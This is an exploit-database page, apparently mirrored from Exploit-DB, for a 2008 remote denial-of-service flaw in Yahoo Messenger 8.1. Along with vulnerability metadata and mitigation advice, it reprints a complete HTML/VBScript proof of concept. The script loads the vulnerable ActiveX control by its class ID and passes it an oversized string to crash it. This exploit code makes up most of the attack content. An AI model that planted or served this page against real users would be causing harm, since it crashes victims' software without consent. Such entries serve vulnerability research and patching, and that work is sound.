header-logo
Suggest Exploit
vendor:
Messenger
by:
milw0rm.com
7.8
CVSS
HIGH
Remote DoS
119
CWE
Product Name: Messenger
Affected Version From: 8.1
Affected Version To: 8.1
Patch Exists: YES
Related CWE: N/A
CPE: a:yahoo:messenger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Yahoo Messenger 8.1 (latest) Remote DoS

A vulnerability in Yahoo Messenger 8.1 (latest) allows remote attackers to cause a denial of service (crash) via a crafted string argument to the c method of the target ActiveX control.

Mitigation:

Upgrade to the latest version of Yahoo Messenger 8.1
Source

Exploit-DB raw data:

Yahoo Messenger 8.1 (latest) Remote DoS
Safe for Scripting, Safe for Initialize

<html><body>

<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>
<script language=vbscript>


arg1=String(517140, "A")
target.c arg1


</script>
</body></html>

# milw0rm.com [2008-07-14]

Navigation

Suggest Exploit

Services By CQR